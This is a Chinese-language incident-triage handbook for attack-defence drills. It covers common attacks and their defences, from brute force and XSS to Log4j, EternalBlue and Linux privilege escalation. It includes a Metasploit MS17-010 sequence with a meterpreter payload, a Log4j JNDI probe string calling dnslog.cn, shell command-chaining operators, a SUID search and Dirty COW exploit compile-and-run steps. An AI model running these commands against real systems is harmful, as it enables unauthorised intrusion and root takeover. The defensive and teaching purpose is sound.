攻防演练事件研判篇
字数 3313 2025-08-11 17:40:19
网络安全攻防演练事件研判技术手册
网络安全攻击类型与危害
主要攻击类型
- 暴力破解:通过大量尝试破解用户名、密码、验证码等
- XSS跨站脚本攻击:在网页中插入恶意脚本控制用户浏览器
- 目录遍历:利用漏洞访问未授权的目录和文件
- 恶意通信:主机与恶意IP/域名进行通信
- 永恒之蓝勒索病毒:利用SMB漏洞传播的恶意软件
- 权限提升:从低权限用户提升到管理员权限
- SQL注入:通过构造SQL语句获取数据库信息
- 文件上传漏洞:上传恶意文件获取服务器控制权
- 命令注入:在输入中注入系统命令
- 挖矿病毒:利用受害者计算资源进行加密货币挖矿
- Log4j远程代码执行:利用Log4j漏洞执行任意代码
攻击危害
-
经济损失和业务损失:
- 业务中断、数据泄露
- 可能导致公司年利润化为泡影
- 政企单位系统受损影响社会运转
-
人身安全:
- 医疗系统被入侵可能危及病人安全
- 无人驾驶汽车和机场系统被控制
-
互联网环境破坏:
- 服务器被变成"肉鸡"攻击其他主机
- 信用卡、个人隐私数据流入黑产行业
事件研判方法
-
日志分析:
- 导出最近7天日志,包含:
- 源地址、目的地址
- 事件名称、时间
- 规则ID、发生次数
- 导出最近7天日志,包含:
-
研判依据:
- 动作、地址、事件名称、时间等信息
防护方法
攻击前防护
- 渗透测试
- 漏洞扫描
攻击后处置
- 应急响应
- 安全加固
暴力破解攻击
攻击方法
-
传统暴力攻击:
- 尝试字母数字组合顺序生成密码
- 消耗时间长,取决于系统和密码长度
-
隐藏页面发现:
- 尝试猜测页面名称,通过响应状态判断存在性
-
哈希破解:
- 从给定哈希猜出密码
- 生成随机密码哈希与目标匹配
-
技术变种:
- 穷举法:生成可能的密码全集
- 字典攻击:使用高频密码字典
- 彩虹表攻击:交替计算明文和HASH生成哈希链
- 逆向暴力破解:针对多个用户名尝试一个密码
危害
- 密码被盗取,信息泄露
- 服务器性能受影响甚至被控制
- 设备瘫痪,服务器死机(如SSH暴力破解)
防御措施
- 设计安全的验证码
- 认证错误次数限制(如错误三次三小时内不可登录)
- 双因素认证
- 提高安全意识,定期修复漏洞
DDoS攻击
攻击类型
-
应用层攻击(第七层):
- HTTP洪水攻击:大量HTTP请求涌向服务器
-
协议攻击:
- 状态耗尽攻击,过度消耗服务器资源
-
容量耗尽攻击:
- 消耗目标与互联网间所有可用带宽
症状迹象
- 网站或服务突然变慢或不可用
- 请求数量不明原因激增
- 奇怪的流量模式(如夜间异常访问)
危害
- 业务受损,客流量流失
- 企业形象受损,用户体验下降
- 攻击者趁机进行其他犯罪活动
防护措施
- 高防IP:流量清洗过滤
- 软件防火墙:过滤异常流量
- 黑洞路由
- 速率限制
- Web应用程序防火墙
- Anycast网络扩散
XSS跨站脚本攻击
攻击原理
客户端访问有漏洞网站,执行攻击者放置的恶意代码
攻击类型
-
存储型XSS:
- 恶意HTML存储到服务器数据库
- 危害最大,可持续攻击
-
反射型XSS:
- XSS代码出现在URL中
- 服务器解析后随响应返回执行
-
DOM型XSS:
- 通过JavaScript操作DOM
- 全程前端,无后端参与
攻击流程
- 攻击者寻找漏洞网站
- 发送带有恶意字符串的链接
- 用户点击链接
- 服务器返回HTML文档
- 客户端执行恶意脚本
危害
- Cookie劫持
- CSRF攻击
- XSS钓鱼
- 获取用户信息
- XSS蠕虫传播
防御措施
- 基于特征的防御(如检索JavaScript关键词)
- 优化Web应用开发减少漏洞
- 对用户提交信息进行过滤
- 实现Session标记、验证码系统
- 内容规范化,使用httponly的cookie
SQL注入攻击
注入原理
Web应用对用户输入合法性判断不严,添加额外SQL语句
注入类型
- 数值型注入
- 字符型注入(单引号、双引号、括号)
- 盲注
- 其他类型(GET、POST、Cookie、HTTP Header注入)
攻击流程
- 判断注入类型
- 猜解字段数
- 确定字段显示顺序
- 获取当前数据库
- 获取数据库表
- 获取表字段名
- 下载数据
危害
- 盗取用户数据和隐私
- 数据库"增删改查"操作
- 添加管理员账号
- 植入网页木马,篡改网页
防御措施
- 提高开发人员安全意识
- 技术手段防御
- 使用云服务商安全产品
- XSS恶意网站信息数据库
文件上传漏洞
漏洞原理
上传功能未严格校验文件后缀和类型,上传webshell
绕过方式
- JavaScript检查:截断改后缀名
- 服务端检测:MIME类型、扩展名、路径、内容检查
危害
- 上传病毒木马
- 控制Flash行为
- 钓鱼图片欺诈
防御措施
- 上传目录设为不可执行
- 结合MIME Type、后缀检查
- 随机改写文件名和路径
- 单独设置文件服务器域名
- 限制上传文件大小
- 确保上传文件返回正确信息
CSRF跨站请求伪造
攻击原理
盗用用户身份,以用户名义发送恶意请求
攻击方法
- 自动发起GET请求(隐藏img标签)
- 自动发起POST请求(隐藏表单自动提交)
- 引诱用户点击链接(论坛或恶意邮件)
危害
- 发送邮件、消息
- 盗取账号
- 购买商品、转账
防御措施
- 验证Token值
- 验证HTTP Referer头
- XMLHttpRequest附加header
- 仅使用JSON API
命令执行漏洞
漏洞原理
调用字符串转代码函数时未考虑用户控制字符串
攻击流程
常见位置:参数值、Cookie值、HTTP头等
多命令执行方式
Windows:
|:直接执行后面语句||:前面出错执行后面&:都执行&&:前为真执行后
Linux:
;:连续执行&:后台执行$():命令替换`:命令替换
危害
- 直接控制服务器
- 提权控制服务器
防御措施
- 避免使用系统执行命令
- 使用硬编码固定参数
- 动态调整使用选择列表
- 过滤或转义危险字符
- 禁止不完全控制的危险函数
恶意通信
隐蔽隧道通信
-
SOCKS隧道:
- 代理服务,支持TCP/UDP
- 支持一对多连接
-
ICMP隧道:
- 利用ICMP报文携带数据
- 高隐蔽性,不占用端口
- 传输不稳定,带宽低
C&C通信
攻击者通过出方向连接控制内网主机
危害:
- 横向移动
- 机密数据盗取
- DDoS攻击
- APT攻击
通信方式:
- 通过IP访问C&C服务器
- 通过域名访问
- Fast-flux技术
- 使用网站/论坛作为C&C
- DGA生成随机域名
挖矿病毒
病毒特征
- 隐蔽性、破坏性、寄生性
- 可执行性、可触发性
- 攻击主动性、针对性
症状表现
- 工作异常、死机
- 程序不能运行
- 磁盘空间异常
- 系统启动变慢
- 数据和程序丢失
- 异常声音/画面
挖矿病毒特点
- 多样化传播方式
- 隐蔽谋利行为
- 频繁更新
危害
- 占用计算资源
- 植入其他病毒
- 系统锁死破坏
- 内网大规模DDoS
应急响应工具
- Process Hacker
- Process Explorer
- PC Hunter
- 火绒剑
Windows检测
- CPU占用接近100%
- 异常进程
分析命令:
wmic process get caption,commandline /value
wmic process where caption="svchost.exe" get caption,commandline /value
Linux检测
- 安全平台告警
- top查看高CPU占用
处理命令:
ps -auxef
netstat -tulnp
kill -9 [pid]
rm -f [exe_path]
crontab -l
cat /etc/anacrontab
永恒之蓝(MS17-010)
漏洞简介
利用Windows SMB漏洞获取系统最高权限
攻击利用
search ms17_010
use 0
set payload windows/x64/meterpreter/bind_tcp
set RHOSTS [目标IP]
run
防御措施
- Windows Update更新
- 安装补丁
- 关闭445端口
Log4j2远程代码执行
漏洞原理
Log4j2默认支持JNDI Lookup,未限制传入内容
利用版本
2.0到2.14.1
漏洞探测
${jndi:ldap://${sys:java.version}.dnslog.cn}
漏洞修复
- 升级到2.15.0+
- 删除漏洞类:
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class - 禁用lookup功能:
- 配置
%msg{nolookups} - JVM参数
-Dlog4j2.formatMsgNoLookups=true - 配置文件
log4j2.formatMsgNoLookups=true - 环境变量
LOG4J_FORMAT_MSG_NO_LOOKUPS=true
- 配置
- 升级JDK版本
权限提升
Windows提权
- 系统漏洞提权
- UAC绕过
Linux提权
- SUID提权:
find / -perm -u=s -type f 2>/dev/null - 脏牛漏洞(CVE-2016-5195):
- 影响范围广(Linux内核长期存在)
- 利用竞态条件破坏COW过程
脏牛复现:
- 信息收集:
./linux-exploit-suggester.sh - 编译执行exp:
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o exp lasc.cpp -lutil ./exp - 获取root权限
提权资源
- Windows漏洞扫描工具
- Windows内核漏洞利用合集
- Linux提权检查脚本